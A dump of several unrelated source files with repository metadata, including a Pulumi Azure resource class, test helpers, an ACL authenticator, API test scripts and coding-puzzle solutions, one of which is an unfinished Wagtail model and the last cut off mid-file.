__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:storage/v20210401:EncryptionScope"), pulumi.Alias(type_="azure-native:storage:EncryptionScope"), pulumi.Alias(type_="azure-nextgen:storage:EncryptionScope"), pulumi.Alias(type_="azure-native:storage/v20190601:EncryptionScope"), pulumi.Alias(type_="azure-nextgen:storage/v20190601:EncryptionScope"), pulumi.Alias(type_="azure-native:storage/v20200801preview:EncryptionScope"), pulumi.Alias(type_="azure-nextgen:storage/v20200801preview:EncryptionScope"), pulumi.Alias(type_="azure-native:storage/v20210101:EncryptionScope"), pulumi.Alias(type_="azure-nextgen:storage/v20210101:EncryptionScope"), pulumi.Alias(type_="azure-native:storage/v20210201:EncryptionScope"), pulumi.Alias(type_="azure-nextgen:storage/v20210201:EncryptionScope")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(EncryptionScope, __self__).__init__(
'azure-native:storage/v20210401:EncryptionScope',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'EncryptionScope':
"""
Get an existing EncryptionScope resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = EncryptionScopeArgs.__new__(EncryptionScopeArgs)
__props__.__dict__["creation_time"] = None
__props__.__dict__["key_vault_properties"] = None
__props__.__dict__["last_modified_time"] = None
__props__.__dict__["name"] = None
__props__.__dict__["require_infrastructure_encryption"] = None
__props__.__dict__["source"] = None
__props__.__dict__["state"] = None
__props__.__dict__["type"] = None
return EncryptionScope(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> pulumi.Output[str]:
"""
Gets the creation date and time of the encryption scope in UTC.
"""
return pulumi.get(self, "creation_time")
@property
@pulumi.getter(name="keyVaultProperties")
def key_vault_properties(self) -> pulumi.Output[Optional['outputs.EncryptionScopeKeyVaultPropertiesResponse']]:
"""
The key vault properties for the encryption scope. This is a required field if encryption scope 'source' attribute is set to 'Microsoft.KeyVault'.
"""
return pulumi.get(self, "key_vault_properties")
@property
@pulumi.getter(name="lastModifiedTime")
def last_modified_time(self) -> pulumi.Output[str]:
"""
Gets the last modification date and time of the encryption scope in UTC.
"""
return pulumi.get(self, "last_modified_time")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="requireInfrastructureEncryption")
def require_infrastructure_encryption(self) -> pulumi.Output[Optional[bool]]:
"""
A boolean indicating whether or not the service applies a secondary layer of encryption with platform managed keys for data at rest.
"""
return pulumi.get(self, "require_infrastructure_encryption")
@property
@pulumi.getter
def source(self) -> pulumi.Output[Optional[str]]:
"""
The provider for the encryption scope. Possible values (case-insensitive): Microsoft.Storage, Microsoft.KeyVault.
"""
return pulumi.get(self, "source")
@property
@pulumi.getter
def state(self) -> pulumi.Output[Optional[str]]:
"""
The state of the encryption scope. Possible values (case-insensitive): Enabled, Disabled.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
| [
"[email protected]"
] | |
8ba2e1d1a7dd1c30e8a51f573682ad69ca86c3a5 | 3a6a211ea0d32405497fbd6486c490bb147e25f9 | /systrace/systrace/decorators.py | 8545eaac83a986ba07ccf8d3d8f5e450b9ede645 | [
"BSD-3-Clause"
] | permissive | catapult-project/catapult | e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0 | 53102de187a48ac2cfc241fef54dcbc29c453a8e | refs/heads/main | 2021-05-25T07:37:22.832505 | 2021-05-24T08:01:49 | 2021-05-25T06:07:38 | 33,947,548 | 2,032 | 742 | BSD-3-Clause | 2022-08-26T16:01:18 | 2015-04-14T17:49:05 | HTML | UTF-8 | Python | false | false | 1,238 | py | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
def HostOnlyTest(func):
"""Decorator for running unit tests only on the host device.
This will disable unit tests from running on Android devices.
"""
return _SkipTestDecoratorHelper(func, ['android'])
def ClientOnlyTest(func):
"""Decorator for running unit tests only on client devices (Android).
"""
return _SkipTestDecoratorHelper(func, ['win', 'linux', 'mac'])
def Disabled(func):
"""Decorator for not running a unit test on any Trybot platform.
"""
return _SkipTestDecoratorHelper(func, ['win', 'linux', 'mac', 'android'])
def LinuxMacTest(func):
return _SkipTestDecoratorHelper(func, ['win', 'android'])
def _SkipTestDecoratorHelper(func, disabled_strings):
if not hasattr(func, '_disabled_strings'):
setattr(func, '_disabled_strings', set(disabled_strings))
return func
def ShouldSkip(test, device):
"""Returns whether the test should be skipped and the reason for it."""
if hasattr(test, '_disabled_strings'):
disabled_devices = getattr(test, '_disabled_strings')
return device in disabled_devices
return False
| [
"[email protected]"
] | |
a361554f5dad634f34447cdfe1a41122e44a0a07 | 8f8498bb6f56b19d45a1989c8113a077348c0a02 | /백준/Gold/말이 되고픈 원숭이.py | 46295228740c2fdbc91505c286b5dad4b556c089 | [] | no_license | gjtjdtn201/practice | a09b437c892b0b601e156c09cb1f053b52fab11b | ea45582b2773616b2b8f350b927559210009d89f | refs/heads/master | 2021-01-01T13:29:46.640740 | 2020-11-28T00:55:37 | 2020-11-28T00:55:37 | 239,299,485 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,358 | py | import sys
sys.stdin = open('말이 되고픈 원숭이.txt', 'r')
from collections import deque
import sys
input = sys.stdin.readline
def BFS():
while queue:
a, b, jump = queue.popleft()
if a == H-1 and b == W-1:
print(visit[a][b][jump]-1)
return
if jump < K:
monkey(a, b, jump)
horse(a, b, jump)
elif jump == K:
monkey(a, b, jump)
print(-1)
def monkey(a, b, jump):
for i in range(8, 12):
ny = a + dy[i]
nx = b + dx[i]
if 0 <= ny < H and 0 <= nx < W and matrix[ny][nx] == 0 and visit[ny][nx][jump] == 0:
queue.append((ny, nx, jump))
visit[ny][nx][jump] = visit[a][b][jump] + 1
def horse(a, b, jump):
for i in range(8):
ny = a + dy[i]
nx = b + dx[i]
if 0 <= ny < H and 0 <= nx < W and matrix[ny][nx] == 0 and visit[ny][nx][jump+1] == 0:
queue.append((ny, nx, jump + 1))
visit[ny][nx][jump + 1] = visit[a][b][jump] + 1
K = int(input())
W, H = map(int, input().split())
matrix = [list(map(int, input().split())) for _ in range(H)]
visit = [[[0]*(K+1) for _ in range(W)] for __ in range(H)]
visit[0][0][0] = 1
dy = [-2, -1, 1, 2, 2, 1, -1, -2, 0, 0, 1, -1]
dx = [1, 2, 2, 1, -1, -2, -2, -1, 1, -1, 0, 0]
queue = deque()
queue.append((0, 0, 0))
BFS() | [
"[email protected]"
] | |
cde6425b065b34539b69cfdaeedad2b56631949b | cbd1c52de6cd45208ecce076c238dfc75cebd70a | /check_restfulapi_cluster.py | 7b0a74cda346221e1103d4859b6468d17aefbb0f | [
"Apache-2.0"
] | permissive | enterpriseih/distributed-realtime-capfaiss | 2e20cad0c788c0700df948b6a46be52d91ac5b9b | 3346f540b6c9d17a6be446fefa8c9b79164929d9 | refs/heads/main | 2023-08-16T20:30:20.807161 | 2020-12-11T02:50:41 | 2020-12-11T02:50:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,598 | py | import sys
sys.path.append('core.zip')
import json
import numpy as np
from core.utils.utils import NpEncoder
import requests
import argparse
from core.utils.udecorator import elapsed_time
import time
headers = {
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'User-Agent': 'Mozilla/5.0',
'content-type': 'application/json',
'charset': 'UTF-8',
}
# @elapsed_time
def ReindexApiTest(host, port, rc_id):
url = 'http://{host}:{port}/{url}'.format(host=host, port=port, url='rc/reindex')
d = 100
nb = 2000
np.random.seed(1234)
xb = np.random.random((nb, d)).astype('float32')
xb[:, 0] += np.arange(nb) / 1000.
ids = ['u' + str(i) for i in range(nb)]
data = json.dumps({
'rcId': rc_id,
'ids': ids,
'vectors': json.loads(json.dumps(xb, cls=NpEncoder)),
})
r = requests.post(url, data=data, headers=headers)
return r
# @elapsed_time
def SearchApiTest(host, port, rc_id):
url = 'http://{host}:{port}/{url}'.format(host=host, port=port, url='rc/search')
d = 100
nb = 2000
np.random.seed(1234)
xb = np.random.random((nb, d)).astype('float32')
xb[:, 0] += np.arange(nb) / 1000.
ids = ['u' + str(i) for i in range(1)]
data = json.dumps({
'rcId': rc_id,
'ids': ids,
'vectors': json.loads(json.dumps(xb[0:1], cls=NpEncoder)),
})
req = requests.post(url, data=data, headers=headers)
return req
# @elapsed_time
def AddApiTest(host, port, rc_id):
url = 'http://{host}:{port}/{url}'.format(host=host, port=port, url='rc/add')
print(url)
d = 100
nb = 1000
np.random.seed(4567)
xb = np.random.random((nb, d)).astype('float32')
xb[:, 0] += np.arange(nb) / 2000.
ids = ['u' + str(i + nb) for i in range(1, nb + 1)]
data = json.dumps({
'rcId': rc_id,
'ids': ids,
'vectors': json.loads(json.dumps(xb, cls=NpEncoder)),
})
req = requests.post(url, data=data, headers=headers)
return req
# @elapsed_time
def DelApiTest(host, port, rc_id):
url = 'http://{host}:{port}/{url}'.format(host=host, port=port, url='rc/del')
ids = ['u' + str(i) for i in range(10)]
data = json.dumps({
'rcId': rc_id,
'ids': ids,
})
req = requests.post(url, data=data, headers=headers)
return req
if __name__ == '__main__':
print('test begin...')
parser = argparse.ArgumentParser()
parser.add_argument('--host', type=str, default='localhost', required=False, help='')
parser.add_argument('--port', type=str, default='8088', required=False, help='')
parser.add_argument('--rc_id', type=str, default='101001101', required=False, help='')
params = parser.parse_args()
req = ReindexApiTest(params.host, params.port, params.rc_id)
print("""
reindex
status_code...%s
content...%s
""" % (req.status_code, req.content))
time.sleep(10)
req = AddApiTest(params.host, params.port, params.rc_id)
print("""
add
status_code...%s
content...%s
""" % (req.status_code, req.content))
# req = SearchApiTest(params.host, params.port, params.rc_id)
#
# print("""
# search
# content...%s
#
# """ % (req.status_code))
#
# req = DelApiTest(params.host, params.port, params.rc_id)
#
# print("""
# delete
# content...%s
#
# """ % (req.status_code))
| [
"[email protected]"
] | |
47949d71e67aab2c8326b7adfb8dd5c830cf7c92 | 4381f8499b38abb995a3495721802179e9a5868f | /cloudbroker/actorlib/authenticator.py | 9b9692b826caaf75fe0587a7eca5af0628a45174 | [] | no_license | rainmanh/openvcloud | 49733d9e87f499bcdd3d9a97393caac22b10c1c1 | 50a9d1d6d9d105fc7812eaa44f395e0f092e0ef8 | refs/heads/master | 2021-06-26T22:50:40.620705 | 2017-08-21T13:20:40 | 2017-08-21T13:20:40 | 103,622,852 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,769 | py | from js9 import j
from JumpScale9Portal.portal import exceptions
from .cloudbroker import models
class auth(object):
def __init__(self, acl=None, level=None):
self.acl = acl or dict()
for key in self.acl:
if key not in ['account', 'cloudspace', 'machine']:
raise ValueError('Unexpected resource type specified in acl dict, only account, '
'cloudspace and machine are allowed.')
self.level = level
self.models = models
def getAccountAcl(self, account):
result = dict()
if account.status in ['DESTROYED', 'DESTROYING']:
return result
for ace in account.acl:
if ace.type == 'U':
ace_dict = dict(userGroupId=ace.userGroupId, account_right=set(ace.right),
right=set(ace.right), type='U', canBeDeleted=True, status=ace.status)
result[ace.userGroupId] = ace_dict
return result
def getCloudspaceAcl(self, cloudspace):
result = dict()
if cloudspace.status in ['DESTROYED', 'DESTROYING']:
return result
for ace in cloudspace.acl:
if ace.type == 'U':
ace_dict = dict(userGroupId=ace.userGroupId, cloudspace_right=set(ace.right),
right=set(ace.right), type='U', canBeDeleted=True, status=ace.status)
result[ace.userGroupId] = ace_dict
for user_id, ace in self.getAccountAcl(cloudspace.account).items():
if user_id in result:
result[user_id]['canBeDeleted'] = False
result[user_id]['right'].update(ace['right'])
result[user_id]['account_right'] = ace['account_right']
else:
ace['canBeDeleted'] = False
result[user_id] = ace
return result
def getVMachineAcl(self, machine):
result = dict()
for ace in machine.acl:
if ace.type == 'U':
ace_dict = dict(userGroupId=ace.userGroupId, right=set(ace.right),
type='U', canBeDeleted=True, status=ace.status)
result[ace.userGroupId] = ace_dict
for user_id, ace in self.getCloudspaceAcl(machine.cloudspace).items():
if user_id in result:
result[user_id]['canBeDeleted'] = False
result[user_id]['right'].update(ace['right'])
else:
ace['canBeDeleted'] = False
result[user_id] = ace
return result
def expandAclFromVMachine(self, users, groups, vmachine):
if not self.level or self.level == 'machine':
fullacl = self.expandAcl(users, groups, vmachine.acl)
else:
fullacl = set()
cloudspace = vmachine.cloudspace
fullacl.update(self.expandAclFromCloudspace(users, groups, cloudspace))
return fullacl
def expandAclFromCloudspace(self, users, groups, cloudspace):
if not self.level or self.level == 'cloudspace':
fullacl = self.expandAcl(users, groups, cloudspace.acl)
else:
fullacl = set()
account = cloudspace.account
fullacl.update(self.expandAcl(users, groups, account.acl))
return fullacl
def expandAclFromAccount(self, users, groups, account):
fullacl = self.expandAcl(users, groups, account.acl)
return fullacl
def expandAcl(self, user, groups, acl):
fullacl = set()
for ace in acl:
right = set(ace.right)
if ace.type == 'U' and ace.userGroupId == user:
fullacl.update(right)
elif ace.type == 'G' and ace.userGroupId in groups:
fullacl.update(right)
return fullacl
def __call__(self, func):
def wrapper(*args, **kwargs):
if 'ctx' not in kwargs:
# call is not performed over rest let it pass
return func(*args, **kwargs)
ctx = kwargs['ctx']
ctx.env['JS_AUDIT'] = True
tags = j.data.tags.getObject()
user = ctx.env['beaker.session']['user']
account = None
cloudspace = None
machine = None
if self.acl:
if 'machineId' in kwargs and kwargs['machineId']:
machine = self.models.VMachine.get(kwargs['machineId'])
cloudspace = machine.cloudspace
account = cloudspace.account
elif 'diskId' in kwargs and kwargs['diskId']:
disk = self.models.Disk.get(kwargs['diskId'])
machine = self.models.VMachine.objects(disks=disk.id, status__ne='DESTROYED').first()
if machine:
cloudspace = machine.cloudspace
account = disk.account
elif 'cloudspaceId' in kwargs and kwargs['cloudspaceId']:
cloudspace = self.models.Cloudspace.get(kwargs['cloudspaceId'])
account = cloudspace.account
elif 'accountId' in kwargs and kwargs['accountId']:
account = self.models.Account.get(kwargs['accountId'])
for key, value in (('accountId', account), ('cloudspaceId', cloudspace), ('machineId', machine)):
if value is not None:
tags.tagSet(key, str(value.id))
ctx.env['tags'] = str(tags)
if self.isAuthorized(user, account, cloudspace, machine):
return func(*args, **kwargs)
else:
raise exceptions.Forbidden(
'''User: "%s" isn't allowed to execute this action.
Not enough permissions''' % user)
return wrapper
def checkAccountStatus(self, requiredaccessrights, account):
"""
Check if the required action can be executed on an account. If account is 'DISABLED',
'DESTROYED', 'ERROR' and action requires a permission other than READ, the call should
fail with 403 Forbidden
Check if the required action can be executed on an account. If account is
'DESTROYED' then a 404 NotFound will be returned, else if an action requires a permission
other than READ, the call will fail with 403 Forbidden if account is not 'CONFIRMED'
:param requiredaccessrights: the required access rights to access an account or one of
its cloudspaces or machines
:param account: the account object its status should be checked
:raise Exception with 403 Forbidden if action cannot be performed on account or one of
its cloduspaces or machines
:raise Exception with 404 if destroyed or 403 Forbidden if non-read action cannot be
performed on account or one of its cloudspace or machines
"""
if account.status == 'DESTROYED':
raise exceptions.NotFound('Could not find an accessible resource.')
elif requiredaccessrights != set('R') and account.status != 'CONFIRMED':
raise exceptions.Forbidden('Only READ actions can be executed on account '
'(or one of its cloudspace or machines) with status %s.' %
account.status)
def checkCloudspaceStatus(self, requiredaccessrights, cloudspace):
"""
Check if the required action can be executed on a cloudspace. If cloudspace is
'DESTROYED' then a 404 NotFound will be returned, else if an action requires a permission
other than READ, the call will fail with 403 Forbidden if cloudspace is not in any of the
statuses 'VIRTUAL', 'DEPLOYING' or'DEPLOYED'
:param requiredaccessrights: the required access rights to access an cloudspace or one of
its machines
:param cloudspace: the cloudspace object its status should be checked
:raise Exception with 404 if destroyed or 403 Forbidden if non-read action cannot be
performed on cloudspace or one of its machines
"""
if cloudspace.status == 'DESTROYED':
raise exceptions.NotFound('Could not find an accessible resource.')
elif requiredaccessrights != set('R') and cloudspace.status not in ['VIRTUAL', 'DEPLOYING',
'DEPLOYED']:
raise exceptions.Forbidden('Only READ actions can be executed on cloudspace '
'(or one of its machines) with status %s.' %
cloudspace.status)
def isAuthorized(self, username, account, cloudspace=None, machine=None):
"""
Check if a user has the authorization to access a resource
:param username: username of the user to be checked
:param machine: machine object if authorization should be done on machine level
:param cloudspace: cloudspace object if authorization should be done on cloudspace level
:param account: account object if authorization should be done on account level
:return: True if username is authorized to access the resource, False otherwise
"""
userobj = j.portal.tools.models.system.User.objects(name=username).first()
if not userobj or not userobj.active:
raise exceptions.Forbidden('User is not allowed to execute action while status is '
'inactive.')
groups = userobj.groups
# add brokeradmin access
if 'admin' in groups:
return True
if 'account' in self.acl and account:
grantedaccountacl = self.expandAclFromAccount(username, groups, account)
if self.acl['account'].issubset(grantedaccountacl):
self.checkAccountStatus(self.acl['account'], account)
return True
if 'cloudspace' in self.acl and cloudspace:
grantedcloudspaceacl = self.expandAclFromCloudspace(username, groups, cloudspace)
if self.acl['cloudspace'].issubset(grantedcloudspaceacl):
self.checkAccountStatus(self.acl['cloudspace'], account)
self.checkCloudspaceStatus(self.acl['cloudspace'], cloudspace)
return True
if 'machine' in self.acl and machine:
grantedmachineacl = self.expandAclFromVMachine(username, groups, machine)
if self.acl['machine'].issubset(grantedmachineacl):
self.checkAccountStatus(self.acl['machine'], account)
self.checkCloudspaceStatus(self.acl['machine'], cloudspace)
return True
return False
| [
"[email protected]"
] | |
3925ddc8929dab5fdcfe92af27724f8b26c01938 | 9806c35c4acfa16e56535970dbe5f84271b67664 | /eod_aps/wsdl/cta_strategy_wsdl/cta_strategy_wsdl_assemble.py | 71c81c7c89cbf04204b023b497654d74226099a3 | [] | no_license | dsjmhjs/python_eod | a8e3513c77a37cfebf2f21a55bfb19449b8a013b | 48207dd15e7079ef5fd2cf999367c429087197ea | refs/heads/master | 2020-06-25T23:22:30.874309 | 2019-07-29T10:26:02 | 2019-07-29T10:26:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,476 | py | # -*- coding: utf-8 -*-
import socket
from SimpleXMLRPCServer import SimpleXMLRPCServer
from eod_aps.wsdl.cta_strategy_wsdl.strategy_init_tools import backtest_init
from eod_aps.wsdl.cta_strategy_wsdl.load_strategy_parameter_tools import load_strategy_parameter
from eod_aps.wsdl.cta_strategy_wsdl.strategy_online_offline_tools import strategy_online_offline_job
from eod_aps.model.server_constans import server_constant
def cta_test():
cta_test_str = ""
cta_server_list = server_constant.get_cta_servers()
for cta_server in cta_server_list:
server_model = server_constant.get_server_model(cta_server)
result_str = server_model.run_cmd_str('ls')
if 'apps' in result_str:
cta_test_str += '%s: connect success!\n' % cta_server
else:
cta_test_str += '%s: connect error!\n' % cta_server
return cta_test_str
def insert_strategy_state_sql():
cta_server_list = server_constant.get_cta_servers()
from eod_aps.job.insert_strategy_state_sql_job import insert_strategy_state_sql_job
insert_strategy_state_sql_job(cta_server_list)
return 0
if __name__ == '__main__':
s = SimpleXMLRPCServer((socket.gethostbyname(socket.gethostname()), 8000))
s.register_function(cta_test)
s.register_function(backtest_init)
s.register_function(load_strategy_parameter)
s.register_function(strategy_online_offline_job)
s.register_function(insert_strategy_state_sql)
s.serve_forever()
| [
"123456789"
] | 123456789 |
a0a5a76363e80cfc5a89359595d80aa2fb243154 | e0980f704a573894350e285f66f4cf390837238e | /.history/news/models_20201124143954.py | a2869c41e721c2526bbf773e0ca6be950d1e2aec | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 923 | py | from django.db import models
from wagtail.contrib.forms.models import AbstractEmailForm
# Create your models here.
class NewsPage(AbstractEmailForm):
tempalte ='news/news_page.html'
leanding_page_template = 'news/news_page_leading.html'
subpage_types = []
max_coun = 1
intro = RichTextField(blank=True, features=['bold', 'italic', 'ol', 'ul'])
thank_you_text = RichTextField(
blank=True,
features=['bold', 'italic', 'ol', 'ul'])
map_image = models.ForeignKey(
)
map_url = URL Fild
content_panels = AbstractEmailForm.content_panel + [
FieldPanel('intro'),
ImageChooserPanel('map_iamge'),
FieldPanel('map_url'),
InlinePanel('form_fields', label="Form Fields"),
FieldPanel('thank_you_text'),
FieldPanel('from_address'),
FieldPanel('to_address'),
FieldPanel('subject'),
]
| [
"[email protected]"
] | |
05a4146fb28b5f723da1e8ab746ca4eb4e677b6b | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03011/s395360833.py | 44b3d72ee3c129c4de5a06d9a9944ff6210fa8d1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | a, b, c = [int(i) for i in input().split()]
d = a + b
e = a + c
f = b + c
print(min(d, e, f)) | [
"[email protected]"
] | |
287ffcfa056904f0ad86c399480127764911db51 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /kQayLoFNx4QgWahHu_2.py | bb1af1605885be1f995a2ebb66e86374b3d9b1ed | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,528 | py | """
R, a programming language used for Statistics and Data Analysis, has the
function `order`, which returns a list with the indices needed to sort the
original vector(∗).
For example:
my_list = [1, 3, 3, 9, 8]
# Ordered would be: [0, 1, 2, 4, 3]
In plain words, `order` tells you what elements to look at in your original
vector to sort it. The list `my_list[0] + my_list[1] + my_list[2] + my_list[4]
+ my_list[3]` is equivalent to `sorted(my_list)`.
If two or more elements have the same order, their original order is
preserved. Here, `[0, 1, 2, 4, 3]` and `[0, 2, 1, 4, 3]` would both sort the
vector, but only the first one preserves the original order for the two `3`s.
Implement the function `order()` so that it works the same way it does in R.
### Examples
order([9, 1, 4, 5, 4]) ➞ [1, 2, 4, 3, 0]
order(["z", "c", "f", "b", "c"]) ➞ [3, 1, 4, 2, 0]
order(["order", "my", "words"]) ➞ [1, 0, 2]
### Notes
* Expect numbers and lower-case alphabetic characters only.
* Find Part II: Rank [here](https://edabit.com/challenge/dFosbGy8sFFCEx2Ne).
* Vectors in R are similar to a list. Although vectors in R are 1-indexed, your function should be 0-indexed. Other differences between vectors and lists will be ignored for the scope of this challenge.
* If you implement your own algorithm, it must be **stable** , meaning that the order of identical elements doesn't get switched around.
"""
def order(lst):
return sorted(range(len(lst)), key = lambda i: lst[i])
| [
"[email protected]"
] | |
fea56c3ed93ad23d5f94bf01932101dfd8229ae3 | 29e526fb77bc4c13082a0f9c0f4104684a01893b | /apps/shared/tests/__init__.py | e2701bc458fa041f89d343db30d387d028135fda | [
"BSD-3-Clause",
"MIT"
] | permissive | Hugochazz/affiliates | 767034519426a657c0e9b3e38fee94cc3e0042ca | e234b0ab925b33d71cb5ded3d51dccbcbb0e59c1 | refs/heads/master | 2020-12-25T13:51:53.974167 | 2012-10-30T14:55:50 | 2012-10-30T14:55:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,655 | py | from contextlib import contextmanager, nested
from functools import wraps
from smtplib import SMTPException
from django.conf import settings
from django.contrib.sessions.middleware import SessionMiddleware
from django.core.mail.backends.base import BaseEmailBackend
from django.core.management import call_command
from django.db.models import loading
from django.test.client import RequestFactory
from django.utils.translation import get_language
import test_utils
from funfactory.urlresolvers import (get_url_prefix, Prefixer, reverse,
set_url_prefix)
from mock import patch
from nose.tools import eq_, ok_
from tower import activate
from browserid.tests import mock_browserid
from facebook.tests import FacebookAuthClient
class BrokenSMTPBackend(BaseEmailBackend):
"""Simulates an email backend that throws errors."""
def send_messages(self, email_messages):
raise SMTPException('Dummy')
def model_ids(models):
"""Generates a list of model ids from a list of model objects."""
return [m.pk for m in models]
class SessionRequestFactory(RequestFactory):
"""RequestFactory that adds session data to requests."""
def __init__(self, *args, **kwargs):
super(SessionRequestFactory, self).__init__(*args, **kwargs)
self.session_middleware = SessionMiddleware()
def request(self, *args, **kwargs):
request = super(SessionRequestFactory, self).request(*args, **kwargs)
self.session_middleware.process_request(request)
return request
class TestCase(test_utils.TestCase):
"""Base class for Affiliates test cases."""
client_class = FacebookAuthClient
@contextmanager
def activate(self, locale):
"""Context manager that temporarily activates a locale."""
old_prefix = get_url_prefix()
old_locale = get_language()
rf = test_utils.RequestFactory()
set_url_prefix(Prefixer(rf.get('/%s/' % (locale,))))
activate(locale)
yield
set_url_prefix(old_prefix)
activate(old_locale)
def browserid_login(self, email):
"""Logs the test client in using BrowserID."""
factory = SessionRequestFactory()
with self.activate('en-US'):
request = factory.get(reverse('home'))
with mock_browserid(email):
self.client.login(request=request, assertion='asdf')
def assert_viewname_url(self, url, viewname, locale='en-US'):
"""Compare a viewname's url to a given url."""
with self.activate(locale):
view_url = reverse(viewname)
return ok_(url.endswith(view_url),
'URL Match failed: %s != %s' % (url, view_url))
def assert_redirects(self, response, url, status=302):
"""Assert that the given response redirects to the given url."""
eq_(response.status_code, status)
eq_(response['Location'], url)
class ModelsTestCase(TestCase):
"""
Does some pre-setup and post-teardown work to create tables for any
of your test models.
Simply subclass this and set self.apps to a tuple of *additional*
installed apps. These will be added *after* the ones in
settings.INSTALLED_APPS.
Based on http://stackoverflow.com/questions/502916#1827272
"""
apps = []
def _pre_setup(self):
# Add the models to the db.
self._original_installed_apps = list(settings.INSTALLED_APPS)
for app in self.apps:
settings.INSTALLED_APPS.append(app)
loading.cache.loaded = False
call_command('syncdb', interactive=False, verbosity=0)
# Call the original method that does the fixtures etc.
super(ModelsTestCase, self)._pre_setup()
def _post_teardown(self):
# Call the original method.
super(ModelsTestCase, self)._post_teardown()
# Restore the settings.
settings.INSTALLED_APPS = self._original_installed_apps
loading.cache.loaded = False
def refresh_model(instance):
"""Retrieves the latest version of a model instance from the DB."""
return instance.__class__.objects.get(pk=instance.pk)
def patch_settings(**new_settings):
"""
Syntactic sugar for patching many settings at once.
TODO: Replace with override_settings in Django 1.4.
"""
def decorator(f):
@wraps(f)
def wrapped(*args, **kwargs):
patches = []
for name, value in new_settings.items():
patches.append(patch.object(settings, name, value))
with nested(*patches):
return f(*args, **kwargs)
return wrapped
return decorator
| [
"[email protected]"
] | |
632ca58d7b0bc344597473fc66f370f4e79ffa9f | 5f22ddbd3eeb99709e43e7b9a7958c9987c7efa4 | /__competitions/2016/02_15_w19/05.py | 837fdc9e769430694fa5c641b0205db0b1b6dd68 | [] | no_license | salvador-dali/algorithms_general | 04950bd823fc354adc58a4f23b7d2f3d39664798 | aeee3356e2488c6fab08741b1ac26e8bd5e4ac0d | refs/heads/master | 2020-12-14T06:24:10.466601 | 2016-07-17T06:00:17 | 2016-07-17T06:00:17 | 47,397,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47,629 | py | def getArraysFastEven(n, k):
if k == 1:
return tuple([val for pair in zip(range(n / 2, 0, -1), range(n, n/2, -1)) for val in pair])
if k == 2:
return tuple([val for pair in zip(range(n / 2 + 1, n + 1), range(1, n / 2 + 1)) for val in pair])
return -1
def getArraysFastOdd(n, k):
d={
1:[1],
3:[(1,2,3),(1,3,2),(2,1,3),(2,3,1),(3,1,2),(3,2,1)],
5:[(1,3,5,2,4),(1,4,2,5,3),(2,4,1,3,5),(2,4,1,5,3),(2,5,3,1,4),(3,1,4,2,5),(3,1,5,2,4),(3,5,1,4,2),(3,5,2,4,1),(4,1,3,5,2),(4,2,5,1,3),(4,2,5,3,1),(5,2,4,1,3),(5,3,1,4,2)],
7:[(1,4,7,3,6,2,5),(1,5,2,6,3,7,4),(2,5,1,4,7,3,6),(2,5,1,6,3,7,4),(2,6,3,7,4,1,5),(3,6,1,4,7,2,5),(3,6,1,5,2,7,4),(3,6,2,5,1,4,7),(3,6,2,5,1,7,4),(3,6,2,7,4,1,5),(3,7,4,1,5,2,6),(3,7,4,1,6,2,5),(4,1,5,2,6,3,7),(4,1,5,2,7,3,6),(4,1,6,3,7,2,5),(4,1,7,3,6,2,5),(4,7,1,5,2,6,3),(4,7,2,5,1,6,3),(4,7,3,6,1,5,2),(4,7,3,6,2,5,1),(5,1,4,7,2,6,3),(5,1,4,7,3,6,2),(5,2,6,1,4,7,3),(5,2,6,3,7,1,4),(5,2,6,3,7,4,1),(5,2,7,3,6,1,4),(5,2,7,4,1,6,3),(6,2,5,1,4,7,3),(6,3,7,2,5,1,4),(6,3,7,4,1,5,2),(7,3,6,2,5,1,4),(7,4,1,5,2,6,3)],
